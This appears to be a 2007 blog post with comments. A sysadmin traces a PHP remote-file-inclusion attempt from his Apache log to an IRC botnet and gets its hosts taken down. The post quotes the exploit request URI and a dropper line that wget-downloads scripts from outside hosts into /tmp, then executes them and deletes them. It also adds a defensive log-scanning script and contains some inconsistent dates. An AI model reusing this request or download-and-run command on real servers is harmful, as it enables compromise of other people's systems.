The MUIE Botnet

2007/01/23 filed under /web

Looking at your Apache logfiles can be fun. A lot of annoying people try to do all kinds of crazy stuff. Today I noticed this GET request:

GET /p/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?
  + mosConfig_absolute_path=http://electrafusion.com/c.txt?? 
  + HTTP/1.1

Since I'm not a fan of PHP, chances are I don't have this file. And yup, I was correct. I didn't have that file. But the URI in there made me curious. What is that c.txt doing exactly?

<?
shell_exec('cd /tmp;wget http://electrafusion.com/botek.txt;
   + mv botek.txt .sessx;perl .sessx;rm botek.txt.*;
   + wget http://saids.com/a;chmod +x a;
   + mv a sess_vttn737j6k0mci66akhs5u1261;
   + ./sess_vttn737j6k0mci66akhs5u1261;
   + rm a*');
...
?>

Ah! Nice. Go to /tmp, download botek.txt from the same server (see below), move that file to .sessx and execute it with Perl. Then delete the botek.txt file, get yet another file (now from saids.com, but a non-existing file...), execute that too and delete everything.

The script is a little longer, but basically it's trying various ways to get and launch these additional files.

So what does botek.txt exactly do? It opens an IRC connection to Bucharest.RO.EU.Ultra-Chat.Org. On that server (83.170.75.108), it joins the channel #muie and starts listening for commands from two nicknames (fazanul and Sorin ... our 1337 script kiddie). This in fact is rather dangerous. I doubt this botnet will be tremendously big, yet of course this "über hacker" will keep a list of vulnerable hosts. (To you system admins: check if your Savant2_Plugin_textarea.php is vulnerable!)
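One defensive check that follows from the log entry above, as an added example that is not from the original post: a small Python scanner over Apache combined-format access logs that flags any query parameter carrying a URL, and rates the hit high when the parameter name looks like an include path (as mosConfig_absolute_path does) or the remote file is a script/text payload. The log lines are constructed here; the hostname example.invalid stands in for whatever server hosts the payload.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache combined log: client, identd, user, [time], "method uri proto", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3})')

# Parameter names that PHP code typically feeds to include()/require(); a URL
# in such a parameter is a remote-file-inclusion attempt (cf. mosConfig_absolute_path).
INCLUDE_HINT = re.compile(r'(path|dir|root|include|config|file|page|lib)', re.I)
URL_VALUE = re.compile(r'^(https?|ftp)://', re.I)

# Constructed sample log (not from the original post). Line 1 mirrors the
# request shape shown above; lines 2 and 3 are benign traffic.
SAMPLE_LOG = """\
1.2.3.4 - - [23/Jan/2007:10:15:01 +0100] "GET /p/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://example.invalid/c.txt?? HTTP/1.1" 404 299 "-" "libwww-perl/5.805"
5.6.7.8 - - [23/Jan/2007:10:15:07 +0100] "GET /index.php?page=about HTTP/1.1" 200 1523 "-" "Mozilla/5.0"
9.9.9.9 - - [23/Jan/2007:10:16:30 +0100] "GET /search?q=http://example.invalid/docs HTTP/1.1" 200 812 "-" "Mozilla/5.0"
"""

def rfi_hits(log_text):
    """Return (client_ip, request_path, param_name, severity) for every request
    whose query string passes a URL as a parameter value."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash
        parts = urlsplit(m.group('uri'))
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if not URL_VALUE.match(value):
                continue
            # The trailing "??" in the real request is junk appended so the
            # included script ignores whatever the vulnerable code concatenates.
            remote = urlsplit(value.rstrip('?'))
            high = (bool(INCLUDE_HINT.search(name))
                    or remote.path.lower().endswith(('.txt', '.php')))
            hits.append((m.group('ip'), parts.path, name, 'high' if high else 'low'))
    return hits

if __name__ == '__main__':
    for ip, path, name, sev in rfi_hits(SAMPLE_LOG):
        print(f'{sev:4} {ip:15} {path} param={name}')
```

Feed it a real access_log and follow up the "high" hits by checking whether the requested file exists on the host and whether it was ever served with a 200.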

I found a real easy way to get protected against these a**h*les though. Just login to the IRC server, join #muie with a nickname like MUIE|X|\d+ (where \d+ is a random number ;-) and mock this script kiddie's Perl knowledge. Call him script kiddie and they'll ban your IP within a minute. Woohoo! Now my server is safe from them, for my server can't log in to the channel ;)

Anyways, after spending some time in the channel, I noticed quite a few vulnerable hosts already, as this picture shows:

Sad but true ...

So who's hosting these files?

$ host electrafusion.com
electrafusion.com has address 208.179.58.67
electrafusion.com mail is handled by 10 electrafusion.com.

$ gwhois 208.179.58.67
Process query: '208.179.58.67'
[...]
OrgName:    Tierzero 
OrgID:      TIERZ
Address:    700 Wilshire Blvd.
Address:    Suite 600
City:       Los Angeles
StateProv:  CA
PostalCode: 90017
Country:    US
[...]
OrgTechHandle: TECHT-ARIN
OrgTechName:   TECH-TIERZERO 
OrgTechPhone:  +1-213-284-0555
OrgTechEmail:  ipnetworkops@tierzero.net
[...]

Start complaining! ;-) I already contacted TierZero, yet I haven't received any replies, and the files are still online :-(

The most ironic thing about this script kiddie is actually the last line of botek.txt:

# NOTE: DONT REMOVE COPYRIGHTS

Update: TierZero did act on this botnet now:

PING electrafusion.com (208.179.58.67): 56 data bytes
36 bytes from hoanet-gw.dcap1.lax.us.tierzero.net (208.179.32.130): 
Communication prohibited by filter
Vr HL TOS  Len   ID Flg  off TTL Pro  cks      Src      Dst
 4  5  00 5400 a156   0 0000  38  01 b149 xxx.xxx.xxx.xxx  208.179.58.67 

--- electrafusion.com ping statistics ---
1 packets transmitted, 0 packets received, 100% packet loss

Of course I had to tell this Sorin about this news and this is what our conversation was like:

Sorin: w
... thinking I was a zombie, he wanted to see who was online

Me: hahaha where did electrafusion.com go? ;-P
Sorin: bitch

Update: As expected, the script kiddie found a new webserver to download the bot scripts from: http://www.depdiknas.go.id/c.txt

The domain resolves to 222.124.249.2, which belongs to TELKOMNET. abuse@telkom.net.id has been informed and hopefully will respond fast.

I figured I might also be able to get the IRC server taken down:

$ host Bucharest.RO.EU.Ultra-Chat.Org
Bucharest.RO.EU.Ultra-Chat.Org has address 83.170.75.108

$ gwhois 83.170.75.108
Process query: '83.170.75.108'
[...]
% Information related to '83.170.64.0 - 83.170.79.255'

inetnum:        83.170.64.0 - 83.170.79.255
netname:        UK2-NET
descr:          UK2.NET - UK's biggest host
country:        GB
admin-c:        BB963-RIPE
tech-c:         BB963-RIPE
rev-srv:        ns1.uk2.net
rev-srv:        ns2.uk2.net
status:         ASSIGNED PA
mnt-by:         AS13213-MNT
source:         RIPE # Filtered
[...]

This ISP has also been informed.


Update (2007/01/12): The botnet seems to have crumbled! Woohoo!

$ lwp-request -m HEAD http://www.depdiknas.go.id/c.txt
403 Forbidden
[...]

Now that the initial script cannot be called anymore, let's see what we have in our beloved #muie channel:

There's but 2 "users" in there (yes, antimuie is me ;-). Even the fazanul and Sorin nicks are no longer logged in.

Victory!

Posted by: B10m

Trackbacks

"Security Ripcord" mentioned this post in "Botnets Spreading Via PHP Version all_most_happened_to_me":

I know that botnets spreading by vulnerabilities in PHP is not new news. It is however the first time that I have noticed it on my site. So I have been targeted...along with the rest of the planet.

"ha.ckers.org" mentioned this post in "Botnet Destruction - A Drama":

This is actually pretty interesting because he takes it from the very first step (detecting the attack) to logging into the IRC server, to communicating with the OPs, trying to get himself banned to prevent his IP of his server from communicating with the IRC server, to taking down the individual servers that were hosting the files as well as taking down the IRC server.

"Security Ripcord" mentioned this post in "Interview with B10m":

As I stated in a previous post, I have been paying a little more attention to the information provided in URI and Refer sections provided by one of my Wordpress plugins. This information has, at times, contained information about some systems on the I...

Comments

Brian wrote at 2007-01-08 18:14:

Wow, you've got me tailing my log files right now to see what comes up over the course of the day. I jumped into that IRC channel and they tried to issue commands to me which of course didn't work. Wanna go in and gang up on the wimps? ;)

B10m wrote at 2007-01-08 20:32:

Glad I inspired you. The commands can only be issued by the script kiddies (nicknames are hardcoded). But at least TierZero acted on this!

$ ping electrafusion.com

PING electrafusion.com (208.179.58.67) 56(84) bytes of data.
From hoanet-gw.dcap1.lax.us.tierzero.net (208.179.32.130) icmp_seq=1 Packet filtered

Sorin wrote at 2007-01-13 14:22:

Now that I found out your site, you are goink to be raedy for a worold of pain! Be prepared to goink off-link in a couple od days. I warned you.

YorHel wrote at 2007-01-13 23:05:

Haha, scriptkiddies take over the world!

I have been analyzing these scripts and vulnerabilities quite some time (yes, I'm also a "logfilefreak"). And I actually held a presentation about a similar script a few weeks ago. Still, it'll take a long time before they can hurt alert sysadmins.

@Sorin: I assume scriptkiddies.nl is not your website. If it is, you really are stupid. :-)

dick wrote at 2007-02-26 01:03:

Thought you should know I was the unfortunate owner of electrafusion. The server was hacked and of course I did not know, being out of town.
I immediately took it offline.
Hmmm, tierzero did not contact me.
I found this blog only when googling on c.txt.
I did note other servers hacked and took them out and wiped also..
Apologize for the trouble and now we are much more savvy and bumped up the level of security on the servers.

Regards and keep up the good work.. and remember the poor blokes who get hacked often do not know it.
They replaced crond in this case and of course wiped the syslogs..
